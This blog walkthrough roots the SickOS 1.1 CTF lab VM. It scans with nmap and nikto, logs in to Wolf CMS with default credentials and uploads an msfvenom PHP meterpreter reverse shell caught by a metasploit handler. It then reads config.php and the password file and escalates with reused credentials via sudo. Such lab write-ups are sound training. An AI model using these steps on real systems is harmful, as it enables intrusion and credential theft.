Hack the SickOS 1.1 VM (CTF Challenge)

This time we are going to crack SickOS 1.1 in the Boot2root challenges. This CTF gives a clear analogy how hacking strategies can be performed on a network to compromise it in a safe environment. The objective being to compromise the network/machine and gain Administrative/root privileges on them.

WalkThrough

We will start off by finding the target.

 netdiscover

Our target IP is 192.168.0.101. Now we scan the IP by Nmap.

nmap –p- -A 192.168.0.101

The ports that we found open are 22, 3812 and 8080. Here, if you try to open the said VM in the browser then nothing will open and you will find nothing. So, now we will use nikto.

nikto –h 192.168.0.101:3128

Nikto will help us find a text file called Robots.txt. Let’s try and open it in the browser.

This tells us something about /wolfcms that means this website is made in Wolf CMS and/or there is a directory with the name of /wolfcms. Now we try and opened it on the browser but we failed. If you had have observed during nmap that there was something about proxy on 3128. So we will try and set up manual proxy. Give the IP of the VM in the HTTP Proxy and the port 3128

After the proxy has been set up open it in the website as the link: 192.168.0.101/wolfcms/

The page will open as above indicating that it has been made in Wolf CMS. I don’t know much about Wolf CMS so I searched google to know where admin page resides.

As I found the log in page through google, I opened it. And it was asking me for username and password. By default the username and password is admin and admin respectively.

I used the by default username and password and I logged in to the page shown below. Here, select files tab and then select upload files option.

Here, we need to upload the malicious file and to generate it open your terminal in kali and type :

 Msfvenom –p php/meterpreter/reverse_tcp lhost =192.168.0.103 lport=4444 –f raw

Copy the code from <?php to die(); and paste it to a text file with the extension .php. Upload the said file.

Now before running the file run multi/handler in metasploit by typing:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

As you hit enter, run the file too and you will have your session and once you have it, go to the shell and type :

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

After doing the above, you will enter a user of our target and to know what files and directories are their type :

ls

Then read the config.php by typing :

Cat config.php

Reading th config.php file will give you all the details about the databse including username and password i.e root and [email protected]3 respectively.

Moving further read the password file and to do so type :

cat etc/password

Observe all the user details it gives us and you will find that user sickos has the value of 1000:1000 that means that this is the first user. So, we might find ouor here as it is the first user. Therefore, switch user to sickos with the password [email protected] that we found.

su sickos

Then type the following command to see the ID’s :

id

Now we need root access and for that type :

sudo –s

And give the password [email protected] again. And to confirm that you have entered root type :

whoami

Futhermore we need to go into /root to look for the flag so for that run the set of following commands :

cd /root

ls

Here, you will find a text find. Let’s read it.

cat a0216ea4d51874464078c618298b1367.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here.

Related Posts Plugin for WordPress, Blogger...

Leave a Reply